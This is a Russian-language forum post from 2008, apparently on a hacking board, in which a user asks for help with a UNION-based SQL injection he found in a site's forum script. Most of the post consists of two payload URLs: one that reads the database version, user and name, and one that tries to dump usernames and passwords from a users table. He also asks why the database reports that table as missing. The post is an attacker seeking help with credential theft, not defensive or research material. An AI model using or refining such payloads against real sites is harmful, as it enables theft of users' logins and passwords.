|
Познающий
Регистрация: 18.04.2008
Сообщений: 62
С нами:
9507243
Репутация:
37
|
|
То есть при уязвимости в SQL с такой авторизацией получается я никак пассы не достану..? :/ Странно, а зачем же тогда поле Passwd в таблице пользователей сайта..
и еще вопрос: нашел скулю вида:
Код:
http://www.site.ru/forum/input.php?i=-1'+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),user(),database()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38--%20%201
Хочу соответственно узнать логин и пасс юзеров, ввожу:
Код:
http://www.site.ru/forum/input.php?i=-1'+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,username,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+c_users--%20%201
И мне видается ошибка Table 'siteru.c_users' doesn't exist
То есть такой таблицы не существует? Но я же точно знаю, что она есть... и все названия таблиц и колонок правельные! 
Последний раз редактировалось Thrasher88; 13.12.2008 в 03:09..
|